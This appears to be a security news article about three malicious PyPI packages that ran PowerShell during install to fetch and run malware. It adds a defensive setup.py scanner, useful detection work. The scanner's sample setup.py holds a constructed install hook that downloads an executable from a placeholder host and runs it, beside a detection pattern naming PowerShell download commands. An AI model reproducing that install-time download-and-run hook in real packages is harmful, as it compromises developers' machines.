An individual going by the name of Lolip0p has uploaded three malicious packages to the Python Package Index (PyPI) repository that are designed to install malware on the developer systems that download them. The packages, named colorslib (versions 4.6.11 and 4.6.12), httpslib (versions 4.6.9 and 4.6.11), and libhttps (version 4.6.12), were uploaded by the author between January 7, 2023, and January 12, 2023. They were subsequently removed from PyPI, but not before they had been downloaded over 550 times.
According to a report from Fortinet, the three packages ship identical setup scripts that run at installation time, invoke PowerShell, and execute a malicious binary, “Oxzy.exe,” hosted on Dropbox. In other words, simply running pip install on one of them is enough to trigger the payload; no code from the package needs to be imported. Once launched, Oxzy.exe retrieves a next-stage binary named update.exe, which it drops into and runs from the user's temporary folder (“%USER%\AppData\Local\Temp”). Update.exe is flagged by antivirus vendors on VirusTotal as an information stealer capable of dropping additional binaries, one of which is detected by Microsoft as Wacatac. Microsoft describes this trojan as a threat that “can perform a number of actions of a malicious hacker’s choice on your PC,” including delivering ransomware and other payloads.
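As an added illustration, not code from the original report or from Fortinet's analysis: the script below is a small static triage check for the install-time pattern described above, a setup.py that spawns PowerShell (or another shell) to fetch and run a remote executable. It parses the setup script with Python's ast module rather than executing it, and flags command-execution calls, suspicious string literals, and custom cmdclass install hooks. The two setup.py sources it scans are constructed for this example; the package names and the URL in them are placeholders, not the real packages or the Dropbox-hosted Oxzy.exe.

```python
"""Static triage of a setup.py before installation.

Added example (not Fortinet's or PyPI's code). The goal is to review the
setup script without running it, because in this attack the payload runs
during `pip install`, not on import.
"""
import ast
import re

# Callables that execute external commands, as (module, attribute) pairs.
EXEC_CALLS = {
    ("subprocess", "run"), ("subprocess", "Popen"), ("subprocess", "call"),
    ("subprocess", "check_output"), ("subprocess", "check_call"),
    ("os", "system"), ("os", "popen"), ("os", "startfile"),
}

# Substrings in string literals typical of a download-and-execute stager.
SUSPICIOUS_LITERALS = re.compile(
    r"powershell|invoke-webrequest|downloadfile|start-process|"
    r"https?://|\.exe\b|appdata",
    re.IGNORECASE,
)


def _call_name(node):
    """Return (module, attr) for `module.attr(...)`, (None, name) for `name(...)`."""
    f = node.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return (f.value.id, f.attr)
    if isinstance(f, ast.Name):
        return (None, f.id)
    return None


def scan_setup_py(source):
    """Return a sorted list of (lineno, reason) findings for a setup.py source string."""
    findings = set()
    tree = ast.parse(source)
    for node in ast.walk(tree):
        lineno = getattr(node, "lineno", 0)
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in EXEC_CALLS:
                findings.add((lineno, f"command execution via {name[0]}.{name[1]}"))
            elif name in {(None, "exec"), (None, "eval")}:
                findings.add((lineno, f"dynamic code execution via {name[1]}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            m = SUSPICIOUS_LITERALS.search(node.value)
            if m:
                findings.add((lineno, f"suspicious literal {m.group(0)!r}"))
        elif isinstance(node, ast.keyword) and node.arg == "cmdclass":
            # cmdclass= overrides install/develop commands; that is where
            # an install-time payload is usually wired in.
            findings.add((lineno, "custom cmdclass hooks into install"))
    return sorted(findings)


# Constructed sample mimicking the reported pattern. The package name and
# URL are placeholders, not the real packages or stager host.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        # constructed stager, placeholder URL
        subprocess.Popen(["powershell", "-w", "hidden", "-c",
            "Invoke-WebRequest https://example.invalid/stager.exe -OutFile $env:TEMP/stager.exe; Start-Process $env:TEMP/stager.exe"])

setup(name="httpslib-lookalike", version="0.0.1",
      description="A legitimate-looking HTTP helper library.",
      cmdclass={"install": PostInstall})
'''

# Constructed benign setup.py for comparison: no hooks, no execution.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="example-clean", version="1.0.0", description="Plain package with no install hooks.")
'''


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(f"{label}:")
        for lineno, reason in scan_setup_py(src) or [(0, "no findings")]:
            print(f"  line {lineno}: {reason}")
```

To apply this to a real package, fetch the sdist without installing it (for example with pip download --no-deps --no-binary :all:), unpack it, and run scan_setup_py over its setup.py; a convincing description on the project page, as in this campaign, says nothing about what the setup script does. The check is a heuristic for triage, not proof of malice: a legitimate package may also spawn a build tool from setup.py, so hits still need a human look.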
Fortinet FortiGuard Labs researcher Jin Lee noted that the author had attempted to make the packages appear legitimate by including a convincing project description. Behind that description, however, the packages do nothing but download and run a malicious binary executable.
This revelation comes weeks after Fortinet discovered two other rogue packages, named Shaderz and Aioconsol, which also have the capability to gather and exfiltrate sensitive personal information. The incident highlights the ongoing threat of malicious activity in popular open-source package repositories, where threat actors take advantage of trust relationships to plant tainted code and extend the reach of infections. Users are advised to exercise caution when downloading and running packages from untrusted authors, and in particular to review a package's setup script before installing it, since in this campaign the payload ran during installation rather than when the library was imported.